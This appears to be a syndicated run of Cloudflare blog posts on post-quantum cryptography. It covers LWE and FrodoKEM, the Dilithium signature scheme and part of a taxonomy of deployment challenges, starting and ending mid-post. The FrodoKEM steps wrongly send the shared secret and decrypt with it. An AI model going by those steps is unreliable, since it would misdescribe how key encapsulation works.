There are two main kinds of computational LWE problems that are difficult to solve for quantum computers (given certain choices of both q and χ):

  1. Search, which is to recover the secret/hidden variable s by only being given a certain number of samples drawn from the distribution χ.
  2. Decision, which is to distinguish a certain number of samples drawn from the distribution (a, ⟨a, s⟩ + e) from random samples.
Deep Dive Into a Post-Quantum Key Encapsulation Algorithm
The LWE problem: search and decision.

LWE is just noisy linear algebra, and yet it seems to be a very hard problem to solve. In fact, there are many reasons to believe that the LWE problem is hard: the best algorithms for solving it run in exponential time. It also is closely related to the Learning Parity with Noise (LPN) problem, which is extensively studied in learning theory, and it is believed to be hard to solve (any progress in breaking LPN will potentially lead to a breakthrough in coding theory). How does it relate to building cryptography? LWE is applied to the cryptographic applications of the type of public-key. In this case, the secret value s becomes the private key, and the values bi and ei are the public key.

So, why is this problem related to lattices? In other blog posts, we have seen that certain algorithms of post-quantum cryptography are based on lattices. So, how does LWE relate to them? One can view LWE as the problem of decoding from random linear codes, or reduce it to lattices, in particular to problems such as the Short Vector Problem (SVP) or the Shortest independent vectors problem (SIVP): an efficient solution to LWE implies a quantum algorithm to SVP and SIVP. In other blog posts, we talk about SVP, so, in this one, we will focus on the random bounded distance decoding problem on lattices.

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

Lattices (as seen in the image), as a regular and periodic arrangement of points in space, have emerged as a foundation of cryptography in the face of quantum adversaries; one modern problem in which they rely on is the Bounded Distance Decoding (BDD) problem. In the BDD problem, you are given a lattice with an arbitrary basis (a basis is a list of vectors that generate all the other points in a lattice. In the case of the image, it is the pair of vectors b1 and b2). You are then given a vector b3 on it. You then perturb the lattice point b3 by adding some noise (or error) to give x. Given x, the goal is to find the nearest lattice point (in this case b3), as seen in the image. In this case, LWE is an average-case form of BDD (Regev also gave a worst-case to average-case reduction from BDD to LWE: the security of a cryptographic system is related to the worst-case complexity of BDD).

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

The first doll is built. Now, how do we build encryption from this mathematical base? From LWE, we can build a public key encryption algorithm (PKE), as we will see next with FrodoPKE as an example.

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

Public Key Encryption: FrodoPKE

The second doll of the Matryoshka is using a mathematical base to build a Public Key Encryption algorithm from it. Let’s look at FrodoPKE. FrodoPKE is a public-key encryption scheme which is the building block for FrodoKEM. It is made up of three components: key generation, encryption, and decryption. Let’s say again that Persephone wants to communicate with Demeter. They will run the following operations:

  1. Generation: Generate a key pair by taking a LWE sample (like (A, B = As + e mod q)). The public key is A, B and the private key is s. Persephone sends this public key to Demeter.
  2. Encryption: Demeter receives this public key and wants to send a private message with it, something like “come back”. She generates two secret vectors ((s1, e1) and (e2)). She then:
  3. Makes the sample (b1 = As1 + e1 mod q).
  4. Makes the sample (v1 = Bs1 + e2 mod q).
  5. Adds the message m to the most significant bit of v1.
  6. Sends b1 and v1 to Persephone (this is the ciphertext).
  7. Decryption: Persephone receives the ciphertext and proceeds to:
  8. Calculate m = v1 – b1  *  s and is able to recover the message, and she proceeds to leave to meet her mother.

Notice that computing v = v1- b1  * s gives us m + e2 (the message plus the error matrix sampled during encryption). The decryption process performs rounding, which will output the original message m if the error matrix e2 is carefully chosen. If not, notice that there is the potential of decryption failure.

What kind of security does this algorithm give? In cryptography, we design algorithms with security notions in mind, notions they have to attain. This algorithm, FrodoPKE (as with other PKEs), satisfies only IND-CPA (Indistinguishability under chosen-plaintext attack) security. Intuitively, this notion means that a passive eavesdropper listening in can get no information about a message from a ciphertext. Even if the eavesdropper knows that a ciphertext is an encryption of just one of two messages of their choice, looking at the ciphertext should not tell the adversary which one was encrypted. We can also think of it as a game:

A gnome can be sitting inside a box. This box takes a message and produces a ciphertext. All the gnome has to do is record each message and the ciphertext they see generated. An outside-of-the-box adversary, like a troll, wants to beat this game and know what the gnome knows: what ciphertext is produced if a certain message is given. The troll chooses two messages (m1 and m2) of the same length and sends them to the box. The gnome records the box operations and flips a coin. If the coin lands on its face, then they send the ciphertext (c1) corresponding to m1. Otherwise, they send c2 corresponding to m2. The troll, knowing the messages and the ciphertext, has to guess which message was encrypted.

IND-CPA security is not enough for all secure communication on the Internet. Adversaries can not only passively eavesdrop, but also mount chosen-ciphertext attacks (CCA): they can actively modify messages in transit and trick the communicating parties into decrypting these modified messages, thereby obtaining a decryption oracle. They can use this decryption oracle to gain information about a desired ciphertext, and so compromise confidentiality. Such attacks are practical and all that an attacker has to do is, for example, ​​send several million test ciphertexts to a decryption oracle, see Bleichenbacher’s attack and the ROBOT attack, for example.

Without CCA security, in the case of Demeter and Persephone, what this security means is that Hades can generate and send several million test ciphertexts to the decryption oracle and eventually reveal the content of a valid ciphertext that Hades did not generate. Demeter and Persephone then might not want to use this scheme.

Key Encapsulation Mechanisms: FrodoKEM

The last figure of the Matryoshka doll is taking a secure-against-CPA scheme and making it secure against CCA. A secure-against-CCA scheme must not leak information about its private key, even when decrypting arbitrarily chosen ciphertexts. It must also be the case that an adversary cannot craft valid ciphertexts without knowing what the plaintext message is; suppose, again, that the adversary knows the messages encrypted could only be either m0 or m1. If the attacker can craft another valid ciphertext, for example, by flipping a bit of the ciphertext in transit, they can send this modified ciphertext, and see whether a message close to m1 or m0 is returned.

To make a CPA scheme secure against CCA, one can use the Hofheinz, Hovelmanns, and Kiltz (HHK) transformations (see this thesis for more information). The HHK transformation constructs an IND-CCA-secure KEM from both an IND-CPA PKE and three hash functions. In the case of the algorithm we are exploring, FrodoKEM, it uses a slightly tweaked version of the HHK transform. It has, again, three functions (some parts of this description are simplified):

Generation:

  1. We need a hash function G1.
  2. We need a PKE scheme, such as FrodoPKE.
  3. We call the Generation function of FrodoPKE, which returns a public (pk) and private key (sk).
  4. We hash the public key pkh ← G1(pk).
  5. We chose a value s at random.
  6. The public key is pk and the private key sk1 is (sk, s, pk, pkh).

Encapsulate:

  1. We need two hash functions: G2 and F.
  2. We generate a random message u.
  3. We hash the received public key pkh with the random message (r, k) ← G2(pkh || u).
  4. We call the Encryption function of FrodoPKE: ciphertext ← Encrypt(u, pk, r).
  5. We hash: shared secret ← F(c || k).
  6. We send the ciphertext and the shared secret.

Decapsulate:

  1. We need two hash functions (G2 and F) and we have (sk, s, pk, pkh).
  2. We receive the ciphertext and the shared secret.
  3. We call the decryption function of FrodoPKE: message ← Decrypt(shared secret, ciphertext).
  4. We hash: (r , k) ← G2(pkh || message).
  5. We call the Encryption function of FrodoPKE: ciphertext1 ← Encrypt(message, pk, r).
  6. If ciphertext1 == ciphertext, k = k0; else, k = s.
  7. We hash: ss ← F(ciphertext || k).
  8. We return the shared secret ss.

What this algorithm achieves is the generation of a shared secret and ciphertext which can be used to establish a secure channel. It also means that no matter how many ciphertexts Hades sends to the decryption oracle, they will never reveal the content of a valid ciphertext that Hades himself did not generate. This is ensured when we run the encryption process again in Decapsulate to check if the ciphertext was computed correctly, which ensures that an adversary cannot craft valid ciphertexts simply by modifying them.

With this last doll, the algorithm has been created, and it is safe in the face of a quantum adversary.

Other KEMs beyond Frodo

While the ring bearer, Frodo, wanders around and transforms, he was not alone in his journey.  FrodoKEM is currently designated as an alternative candidate for standardization as part of the post-quantum NIST process. But, there are others:

  • Kyber, NTRU, Saber: which are based on variants of the LWE problem over lattices and,
  • Classic McEliece: which is based on error correcting codes.

The lattice-based variants have the advantage of being fast, while producing relatively small keys and ciphertexts. There are concerns about their security, which need to be properly verified, however. More confidence is found in the security of the Classic McEliece scheme, as its underlying problem has been studied for longer (It is only one year older than RSA!). It has a disadvantage: it produces extremely large public keys. Classic-McEliece-348864 for example, produces public keys of size 261,120 bytes, whereas Kyber512, which claims comparable security, produces public keys of size 800 bytes.

They are all Matryoshka dolls (including sometimes non-post-quantum ones). They are all algorithms that are placed one inside the other. They all start with a small but powerful idea: a mathematical problem whose solution is hard to find in an efficient time. They then take the algorithm approach and achieve one cryptographic security. And, by the magic of hashes and length preservation, they achieve more cryptographic security. This just goes to show that cryptographic algorithms are not perfect in themselves; they stack on top of each other to get the best of each one. Facing quantum adversaries with them is the same, not a process of isolation but rather a process of stacking and creating the big picture from the smallest one.

References:

Deep Dive Into a Post-Quantum Signature Scheme

Post Syndicated from Goutam Tamvada original https://blog.cloudflare.com/post-quantum-signatures/

Deep Dive Into a Post-Quantum Signature Scheme

Deep Dive Into a Post-Quantum Signature Scheme

To provide authentication is no more than to assert, to provide proof of, an identity. We can claim who we claim to be but if there is no proof of it (recognition of our face, voice or mannerisms) there is no assurance of that. In fact, we can claim to be someone we are not. We can even claim we are someone that does not exist, as clever Odysseus did once.

The story goes that there was a man named Odysseus who angered the gods and was punished with perpetual wandering. He traveled and traveled the seas meeting people and suffering calamities. On one of his trips, he came across the Cyclops Polyphemus who, in short, wanted to eat him. Clever Odysseus got away (as he usually did) by wounding the cyclops’ eye. As he was wounded, he asked for Odysseus name to which the latter replied:

“Cyclops, you asked for my glorious name, and I will tell it; but do give the stranger’s gift, just as you promised. Nobody I am called. Nobody they called me: by mother, father, and by all my comrades”

(As seen in The Odyssey, book 9. Translation by the authors of the blogpost).

The cyclops believed that was Odysseus’ name (Nobody) and proceeded to tell everyone, which resulted in no one believing him. “How can nobody have wounded you?” they questioned the cyclops. It was a trick, a play of words by Odysseus. Because to give an identity, to tell the world who you are (or who you are pretending to be) is easy. To provide proof of it is very difficult. The cyclops could have asked Odysseus to prove who he was, and the story would have been different. And Odysseus wouldn’t have left the cyclops laughing.

Deep Dive Into a Post-Quantum Signature Scheme

In the digital world, proving your identity is more complex. In face-to-face conversations, we can often attest to the identity of someone by knowing and verifying their face, their voice, or by someone else introducing them to us. From computer to computer, the scenario is a little different. But there are ways. When a user connects to their banking provider on the Internet, they need assurance not only that the information they send is secured; but that they are also sending it to their bank, and not a malicious website masquerading as their provider. The Transport Layer Security (TLS) protocol provides this through digitally signed statements of identity (certificates). Digital signature schemes also play a central role in DNSSEC as well, an extension to the Domain Name System (DNS) that protects applications from accepting forged or manipulated DNS data, which is what happens during DNS cache poisoning, for example.

A digital signature is a demonstration of authorship of a document, conversation, or message sent using digital means. As with “regular” signatures, they can be publicly verified by anyone that knows that it is a signature made by someone.

A digital signature scheme is a collection of three algorithms:

  1. A key generation algorithm, Generate, which generates a public verification key and a private signing key (a keypair).
  2. A signing algorithm, Sign, which takes the private signing key, a message, and outputs a signature of the message.
  3. A verification algorithm, Verify, which takes the public verification key, the signature and the message, and outputs a value stating whether the signature is valid or not.

In the case of the Odysseus’ story, what the cyclops could have done to verify his identity (to verify that he indeed was Nobody) was to ask for a proof of identity: for example, for other people to vouch that he is who he claims to be. Or he could have asked for a digital signature (attested by several people or registered as his own) attesting he was Nobody. Nothing like that happened, so the cyclops was fooled.

In the Transport Layer Security protocol, TLS, authentication needs to be executed at the time a connection or conversation is established (as data sent after this point will be authenticated until that is explicitly disabled), rather than for the full lifetime of the data (as with confidentiality). Because of that, the need to transition to post-quantum signatures is not as urgent as it is for post-quantum key exchange schemes, and we do not believe there are sufficiently powerful quantum computers at the moment that can be used to listen in on connections and forge signatures. At some point, that will no longer be true, and the transition will have to be made.

There are various candidates for authentication schemes (including digital signatures) that are quantum secure: some use cryptographic hash functions, some use problems over lattices, while others use techniques from the field of multi-party computation. It is also possible to use Key Encapsulation Mechanisms (or KEMs) to achieve authentication in cryptographic protocols.

In this post, much like in the one about Key Encapsulation Mechanisms, we will give a bird’s-eye view of the construction of one particular post-quantum signature algorithm. We will discuss CRYSTALS-Dilithium, as an example of how a signature scheme can be constructed. Dilithium is a finalist candidate in the NIST post-quantum cryptography standardization process and provides an example of a standard technique used to construct digital signature schemes. We chose to explain Dilithium here as it is a finalist and its design is straightforward to explain.

We will again build the algorithm up layer-by-layer. We will look at:

  • Its mathematical underpinnings: as we see in other blog posts, a cryptographic algorithm can be built as a Matryoshka doll or a Chinese box. Let us use the Chinese box analogy here. The first box, in this case, is the mathematical base, whose hardness should be strong so that security is maintained. In the post-quantum world, this is usually the hardness of some lattice or isogeny problems.
  • Its algorithmic construction: these are all the subsequent boxes that take the mathematical base and construct an algorithm out of it. In the case of a signature, first one constructs an identification scheme, which we will define in the next sections, and then transform it to a signature scheme using the Fiat-Shamir transformation.
Deep Dive Into a Post-Quantum Signature Scheme

The mathematical core of Dilithium is, as with FrodoKEM, based on the hardness of a variant of the Learning with Errors (LWE) problem and the Short Integer Solution (SIS) problem. As we have already talked about LWE, let’s now briefly go over SIS.

Note to the reader: Some mathematics is coming in the next sections; but don’t worry, we will guide you through it.

The Short Integer Solution Problem

In order to properly explain what the SIS problem is, we need to first start by understanding what a lattice is. A lattice is a regular repeated arrangement of objects or elements over a space. In geometry, these objects can be points; in physics, these objects can be atoms. For our purposes, we can think of a lattice as a set of points in n-dimensional space with a periodic (repeated) structure, as we see in the image. It is important to understand the meaning of n-dimensional space here: a two-dimensional space is, for example, the one that we often see represented on planes: a projection of the physical universe into a plane with two dimensions which are length and width. Historically, lattices have been investigated since the late 18th century for various reasons. For a more comprehensive introduction to lattices, you can read this great paper.

Deep Dive Into a Post-Quantum Signature Scheme
Picture of a lattice. They are found in the wild in Portugal.

What does SIS pertain to? You are given a positive integer q and a matrix (a rectangular array of numbers) A of dimensions n x m (the number of rows is n and the number of columns is m), whose elements are integers between 0 and a number q. You are then asked to find a vector r (smaller than a certain amount, called the “norm bound”) such that Ar = 0. The conjecture is that, for a sufficiently large n, finding this solution is hard even for quantum computers. This problem is “dual” to the LWE problem that we explored in another blog post.

Deep Dive Into a Post-Quantum Signature Scheme

We can define this same problem over a lattice. Take a lattice L(A), made up of m different n-dimensional vectors y (the repeated elements). The goal is to find non-zero vectors in the lattice such that Ay = 0 (mod q) (for some q), whose size is less than a certain specified amount. This problem can be seen as trying to find the “short” solutions in the lattice, which makes the problem the Short Vector Problem (SVP) in the average case. Finding this solution is simple to do in two dimensions (as seen in the diagram), but finding the solution in more dimensions is hard.

Deep Dive Into a Post-Quantum Signature Scheme
The SIS problem as the SVP. The goal is to find the “short” vectors in the radius.

The SIS problem is often used in cryptographic constructions such as one-way functions, collision resistant hash functions, digital signature schemes, and identification schemes.

We have now built the first Chinese box: the mathematical base. Let’s take this base now and create schemes from it.

Identification Schemes

From the mathematical base of our Chinese box, we build the first computational algorithm: an identification scheme. An identification scheme consists of a key generation algorithm, which outputs a public and private key, and an interactive protocol between a prover P and a verifier V. The prover has access to the public key and private key, and the verifier only has access to the public key. A series of messages are then exchanged such that the prover can demonstrate to the verifier that they know the private key, without leaking any other information about the private key.

More specifically, a three-move (three rounds of interaction) identification scheme is a collection of algorithms. Let’s think about it in the terms of Odysseus trying to prove to the cyclops that he is Nobody:

  • Odysseus (the prover) runs a key generation algorithm, Generate, that outputs a public and private keypair.
  • Odysseus then runs a commitment algorithm, Commit, that uses the private key, and outputs a commitment Y. The commitment is nothing more than a statement that this specific private key is the one that will be used. He sends this to the cyclops.
  • The cyclops (the verifier) takes the commitment and runs a challenge algorithm, Challenge, and outputs a challenge c. This challenge is a question that asks: are you really the owner of the private key?
  • Odysseus receives the challenge and runs a response algorithm, Response. This outputs a response z to the challenge. He sends this value to the cyclops.
  • The cyclops runs the verification algorithm, Verify, which outputs either accept (1) or reject (0) if the answer is correct.

If Odysseus was really the owner of the private key for Nobody, he would have been able to answer the challenge in a positive manner (with a 1). But, as he is not, he runs away (and this is the last time we see him in this blogpost).

The Dilithium Identification Scheme

The basic building blocks of Dilithium are polynomials and rings. This is the second-last box of the Chinese box, and we will explore it now.

A polynomial ring, R, is a ring of all polynomials. A ring is a set in which two operations can exist: addition and multiplication of integers; and a polynomial is an expression of variables and coefficients. The “size” of these polynomials, defined as the size of the largest coefficient, plays a crucial role for these kinds of algorithms.

In the case of Dilithium, the Generation algorithm creates a k x l matrix A. Each entry of this matrix is a polynomial in the defined ring. The generation algorithm also creates random private vectors s1 and s2, whose components are elements of R, the ring. The public key is the matrix A and t = As1 + s2. It is infeasible for a quantum computer to know the secret values given just t and A. This problem is called Module-Learning With Errors (MLWE) problem, and it is a variant of LWE as seen in this blog post.

Armed with the public and private keys, the Dilithium identification scheme proceeds as follows (some details are left out for simplicity, like the rejection sampling):

  1. The prover wants to prove they know the private key. They generate a random secret nonce y whose coefficient is less than a security parameter. They then compute Ay and set a commitment w1 to be the “high-order”1 bits of the coefficients in this vector.
  2. The verifier accepts the commitment and creates a challenge c.
  3. The prover creates the potential signature z = y + cs1 (notice the usage of the random secret nonce and of the private key) and performs checks on the sizes of several parameters which makes the signature secure. This is the answer to the challenge.
  4. The verifier receives the signature and computes w1 to be the “high-order” bits of Az−ct (notice the usage of the public key). They accept this answer if all the coefficients of z are less than the security parameter, and if w1 is equal to w0.

The identity scheme previously mentioned is an interactive protocol that requires participation from both parties. How do we turn this into a non-interactive signature scheme where one party issues signatures and other parties can verify them (the reason for this conversation is that anyone should be able to publicly verify)? Here, we place the last Chinese box.

A three-move identification scheme can be turned into a signature scheme using the Fiat–Shamir transformation: instead of the verifier accepting the commitment and sending a challenge c, the prover computes the challenge as a hash H(M || w1)  of the message M and of the value w1 (computed in step 1 of the previous scheme). This is an approach in which the signer has created an instance of a lattice problem, which only the signer knows the solution to.

This in turn means that if a message was signed with a key, it could have only been signed by the person with access to the private key, and it can be verified by anyone with access to the public key.

How is this procedure related to the lattice’s problems we have seen? It is used to prove the security of the scheme: specifically the M-SIS (module SIS) problem and the LWE decisional problem.

The Chinese box is now constructed, and we have a digital signature scheme that can be used safely in the face of quantum computers.

Other Digital Signatures beyond Dilithium

In Star Trek, Dilithium is a rare material that cannot be replicated. Similarly, signatures cannot be replicated or forged: each one is unique. But this does not mean that there are no other algorithms we can use to generate post-quantum signatures. Dilithium is currently designated as a finalist candidate for standardization as part of the post-quantum NIST process. But, there are others:

  • Falcon, another lattice-based candidate, based on NTRU lattices.
  • Rainbow, a scheme based on multivariate polynomials.

We have seen examples of KEMs in other blog posts and signatures that are resistant to attacks by quantum computers. Now is the time to step back and take a look at the bigger picture. We have the building blocks, but the problem of actually building post-quantum secure cryptographic protocols with them remains, as well as making existing protocols such as TLS post-quantum secure. This problem is not entirely straightforward, owing to the trade-offs that post-quantum algorithms present. As we have carefully stitched together mathematical problems and cryptographic tools to get algorithms with the properties we desire, so do we have to carefully compose these algorithms to get the secure protocols that we need.

References:

…..

1This “high-order” and “low-order” procedure decomposes a vector, and there is a specific procedure for this for Dilithium. It aims to reduce the size of the public key.

The Post-Quantum State: a taxonomy of challenges

Post Syndicated from Sofía Celi original https://blog.cloudflare.com/post-quantum-taxonomy/

The Post-Quantum State: a taxonomy of challenges

The Post-Quantum State: a taxonomy of challenges

At Cloudflare, we help to build a better Internet. In the face of quantum computers and their threat to cryptography, we want to provide protections for this future challenge. The only way that we can change the future is by analyzing and perusing the past. Only in the present, with the past in mind and the future in sight, can we categorize and unfold events. Predicting, understanding and anticipating quantum computers (with the opportunities and challenges they bring) is a daunting task. We can, though, create a taxonomy of these challenges, so the future can be better unrolled.

This is the first blog post in a post-quantum series, where we talk about our past, present and future “adventures in the Post-Quantum land”. We have written about previous post-quantum efforts at Cloudflare, but we think that here first we need to understand and categorize the problem by looking at what we have done and what lies ahead. So, welcome to our adventures!

A taxonomy of the challenges ahead that quantum computers and their threat to cryptography bring (for more information about it, read our other blog posts) could be a good way to approach this problem. This taxonomy should not only focus at the technical level, though. Quantum computers fundamentally change the way certain protocols, properties, storage and retrieval systems, and infrastructure need to work. Following the biological tradition, we can see this taxonomy as the idea of grouping together problems into spaces and the arrangement of them into a classification that helps to understand what and who the problems impact. Following the same tradition, we can use the idea of kingdoms to classify those challenges. The kingdoms are (in no particular order):

  1. Challenges at the Protocols level, Protocolla
  2. Challenges at the implementation level, Implementa
  3. Challenges at the standardization level, Regulae
  4. Challenges at the community level: Communitates
  5. Challenges at the research level, Investigationes

Let’s explore them one by one.

The Post-Quantum State: a taxonomy of challenges
The taxonomy tree of the post-quantum challenges.

Challenges at the Protocols level, Protocolla

One conceptual model of the Internet is that it is composed of layers that stack on top of each other, as defined by the Open Systems Interconnection (OSI) model. Communication protocols in each layer enable parties to interact with a corresponding one at the same layer. While quantum computers are a threat to the security and privacy of digital connections, they are not a direct threat to communication itself (we will see, though, that one of the consequences of the existence of quantum computers is how new algorithms that are safe to their attacks can impact the communication itself). But, if the protocol used in a layer aims to provide certain security or privacy properties, those properties can be endangered by a quantum computer. The properties that these protocols often aim to provide are confidentiality (no one can read the content of communications), authentication (communication parties are assured who they are talking to) and integrity (the content of the communication is assured to have not been changed in transit).

Well-known examples of protocols that aim to provide security or privacy properties to protect the different layers are:

We know how to provide those properties (and protect the protocols) against the threat of quantum computers: the solution is to use post-quantum cryptography, and, for this reason, the National Institute of Standards and Technology (NIST) has been running an ongoing process to choose the most suitable algorithms. At this protocol level, then, the problem doesn’t seem to be adding these new algorithms, as nothing impedes it from a theoretical perspective. But protocols and our connections often have other requirements or constraints. Requirements or constraints are, for example, that data to be exchanged fits into a specific packet or segment size. In the case of the Transport Control Protocol (TCP), which ensures that data packets are delivered and received in order, for example, the Maximum Segment SizeMSS — sets the largest segment size that a network-connected device can receive and, if a packet exceeds the MSS, it is dropped (certain middleboxes or software desire all data to fit into a single segment). IPv4 hosts are required to handle an MSS of 536 bytes and IPv6 hosts are required to handle an MSS of 1220 bytes. In the case of DNS, it has primarily answered queries over the User Datagram Protocol (UDP), which limits the answer size to 512 bytes unless the extension EDNS is in use. Larger packets are subject to fragmentation or to the request that TCP should be used: this results in added round-trips, which should be avoided.

Another important requirement is that the operations that algorithms execute (such as multiplication or addition) or the resources they consume (which can be time but also space/memory) are fast enough that connection times are not impacted. This is even more pressing when fast, reliable and cheap Internet access is not available, as access to this “type” of Internet is not globally available.

TLS is a protocol that needs to handle heavy HTTPS traffic load and one that gets impacted by the additional cost that cryptographic operations add. Since 2010, TLS has been deemed “not computationally expensive any more” due to the usage of fast cryptography implementations and abbreviated handshakes (by using resumption, for example). But what if we add post-quantum algorithms into the TLS handshake? Some post-quantum algorithms can be suitable, while others might not be.

Many of the schemes that are part of the third round of the NIST post-quantum process, that can be used for confidentiality, seem to have encryption and decryption performance time comparable (or faster) to fast elliptic-curve cryptography. This in turn means that, from this point of view, they can be practically used. But, what about storage or transmission of the public/private keys that they produce (an attack can be mounted, for example, to force a server into constantly storing big public keys, which can lead to a denial-of-service attack or variants of the SYN flood attack)? What about their impacts on bandwidth and latency? Does having larger keys that span multiple packets (or congestion windows) affect performance especially in scenarios with degraded networks or packet loss?

In 2019, we ran a wide-scale post-quantum experiment with Google’s Chrome Browser team to test these ideas. The goal of that experiment was to assess, in a controlled environment, the impact of adding post-quantum algorithms to the Key Exchange phase of TLS handshakes. This investigation gave us some good insight into what kind of post-quantum algorithms can be used in the Key Agreement part of a TLS handshake (mainly lattice-based schemes, or so it seems) and allowed us to test them in a real-world setting. It is worth noting that these algorithms were tested in a “hybrid mode”: a combination of classical cryptographic algorithms with post-quantum ones.

The key exchange of TLS ensures confidentiality: it is the most pressing task to update it as non-post-quantum traffic captured today can be decrypted by a quantum computer in the future. Luckily, many of the post-quantum Key Encapsulation Mechanisms (KEMs) that are under consideration by NIST seem to be well suited with minimal performance impact. Unfortunately, a problem that has arisen before when considering protocol changes is the presence and behavior of old servers and clients, and of “middleboxes” (devices that manipulate traffic —by inspecting— it for purposes other than continuing the communication process). For instance, some middleboxes assume that the first message of a handshake from a browser fits in a single network packet, which is not the case when adding the majority of post-quantum KEMs. Such false assumptions (“protocol ossification”) are not a problem unique to post-quantum cryptography: the TLS 1.3 standard is carefully crafted to work around quirks of older clients, servers and middleboxes.

While all the data seems to suggest that replacing classical cryptography by post-quantum cryptography in the key exchange phase of TLS handshakes is a straightforward exercise, the problem seems to be much harder for handshake authentication (or for any protocol that aims to give authentication, such as DNSSEC or IPsec). The majority of TLS handshakes achieve authentication by using digital signatures generated via advertised public keys in public certificates (what is called “certificate-based” authentication). Most of the post-quantum signature algorithms currently being considered for standardization in the NIST post-quantum process, have signatures or public keys that are much larger than their classical counterparts. Their operations’ computation time, in the majority of cases, is also much bigger. It is unclear how this will affect the TLS handshake latency and round-trip times, though we have a better insight now in respect to which sizes can be used. We still need to know how much slowdown will be acceptable for early adoption.

There seems to be several ways by which we can add post-quantum cryptography to the authentication phase of TLS. We can:

  • Change the standard to reduce the number of signatures needed.
  • Use different post-quantum signature schemes that fit.
  • Or achieve authentication in a novel way.

On the latter, a novel way to achieve certificate-based TLS authentication is to use KEMs, as their post-quantum versions have smaller sizes than post-quantum signatures. This mechanism is called KEMTLS and we ran a controlled experiment showing that it performs well, even when it adds an extra or full round trip to the handshake (KEMTLS adds half a round trip for server-only authentication and a full round-trip for mutual authentication). It is worth noting that we only experimented with replacing the authentication algorithm in the handshake itself and not all the authentication algorithms needed for the certificate chain. We used a mechanism called “delegated credentials” for this: since we can’t change the whole certificate chain to post-quantum cryptography (as it involves other actors beyond ourselves), we use this short-lived credential that advertises new algorithms. More details around this experiment can be found in our paper.

Lastly, on the TLS front, we wanted to test the notion that having bigger signatures (such as the post-quantum ones) noticeably impacts TLS handshake times. Since it is difficult to deploy post-quantum signatures to real-world connections, we found a way to emulate bigger signatures without having to modify clients. This emulation was done by using dummy data. The result of this experiment showed that even if large signatures fit in the TCP congestion window, there will still be a double-digit percentage slowdown due to the relatively low average Internet speed. This slowdown is a hard sell for browser vendors and for content servers to adopt. The ideal situation for early adoption seems to be that the six signatures and two public keys of the TLS handshake fit together within 9kB (the signatures are: two in the certificate chain, one handshake signature, one OCSP staple and two SCTs for certificate transparency).

After this TLS detour, we can now list the challenges at this kingdom, Protocolla, level. The challenges (in no order in particular) seem to be (divided into sections):

Storage of cryptographic parameters used during the protocol’s execution:

  • How are we going to properly store post-quantum cryptographic parameters, such as keys or certificates, that are generated for/during protocol execution (their sizes are bigger than what we are accustomed to)?
  • How is post-quantum cryptography going to work with stateless servers, ones that do not store session state and where every client request is treated as a new one, such as NFS, Sun’s Network File System (for an interesting discussion on the matter, see this paper)?

Long-term operations and ephemeral ones:

  • What are the impacts of using post-quantum cryptography for long-term operations or for ephemeral ones: will bigger parameters make ephemeral connections a problem?
  • Are security properties assumed in protocols preserved and could we relax others (such as IND-CCA or IND-CPA. For an interesting discussion on the matter, see this paper)?

Managing bigger keys and signatures:

  • What are the impacts on latency and bandwidth?
  • Does the usage of post-quantum increase the roundtrips at the Network layer, for example? And, if so, are these increases tolerable?
  • Will the increased sizes cause dropped or fragmented packets?
  • Devices can occasionally have settings for packets smaller than expected: a router, for example, along a network path can have a maximum transmission unit, MTU (the MSS plus the TCP and IP headers), value set lower than the typical 1,500 bytes. In these scenarios, will post-quantum cryptography make these settings more difficult (one can apply MSS clamping for some cases)?

Preservation of protocols as we know them:

  • Can we achieve the same security or privacy properties as we use them today?
  • Can protocols change: should we change, for example, the way DNSSEC or the PKI work? Can we consider this radical change?
  • Can we integrate and deploy novel ways to achieve authentication?

Hardware (or novel alternative to hardware) usage during protocol’s execution:

Novel attacks:

  • Will post-quantum cryptography increase the possibility of mounting denial of service attacks?

Challenges at the Implementation level, Implementa

The second kingdom that we are going to look at is the one that deals with the implementation of post-quantum algorithms. The ongoing NIST process is standardizing post-quantum algorithms on two fronts: those that help preserve confidentiality (KEMs) and those that provide authentication (signatures). There are other algorithms not currently part of the process that already can be used in a post-quantum world, such as hash-based signatures (for example, XMSS).

What must happen for algorithms to be widely deployed? What are the steps they need to take in order to be usable by protocols or for data at rest? The usual path that algorithms take is:

  1. Standardization: usually by a standardization body. We will talk about it further in the next section.
  2. Efficiency at an algorithmic level: by finding new ways to speed up operations in an algorithm. In the case of Elliptic Curve Cryptography, for example, it happened with the usage of endomorphisms for faster scalar multiplication.
  3. Efficient software implementations: by identifying the pitfalls that cause increase in time or space consumption (in the case of ECC, this paper can illustrate these efforts), and fixing them. An optimal implementation is always dependent on the target, though: where it will be used.
  4. Hardware efficiency: by using, for example, hardware acceleration.
  5. Avoidance of attacks: by looking at the usual pitfalls of algorithms which, in practice, are side-channel attacks.

Implementation of post-quantum cryptography will follow (and is following) the same path. Lattice-based cryptography for KEMs, for example, has taken many steps in order to be faster than ECC (but, from a protocol level perspective, it is inefficient than them, as their parameters are bigger than ECC ones and might cause extra round-trips). Isogeny-based cryptography, on the other hand, is still too slow (due to long isogenies evaluation), but it is an active area of research.

The challenges at this kingdom, Implementa, (in no particular order) level are:

  • Efficiency of algorithms: can we make them faster at the software, hardware (by using  acceleration or FPGA-based research) or at an algorithmic level (with new data structures or parallelization techniques) to meet the requirements of network protocols and ever-fastest connections?
  • Can we use new mechanisms to accelerate algorithms (such as, for example, the usage of floating point numbers as in the Falcon signature scheme)? Will this lead to portability issues as it might be dependent on the underlying architecture?
  • What is the asymptotic complexity of post-quantum algorithms (how they impact time and space)?
  • How will post-quantum algorithms work on embedded devices due to their limited capacity (see this paper for more explanations)?
  • How can we avoid attacks, failures in security proofs and misuse of APIs?
  • Can we provide correct testing of these algorithms?
  • Can we ensure constant-time needs for the algorithms?
  • What will happen in a disaster-recovery mode: what happens if an algorithm is found to be weaker than expected or is fully broken? How will we be able to remove or update this algorithm? How can we make sure there are transition paths to recover from a cryptographical weakening?

At Cloudflare, we have also worked on implementation of post-quantum algorithms. We published our own library (CIRCL) that contains high-speed assembly versions of several post-quantum algorithms (like Kyber, Dilithium, SIKE and CSIDH). We believe that providing these implementations for public use will help others with the transition to post-quantum cryptography by giving easy-to-use APIs that developers can integrate into their projects.

Challenges at the Standards level, Regulae

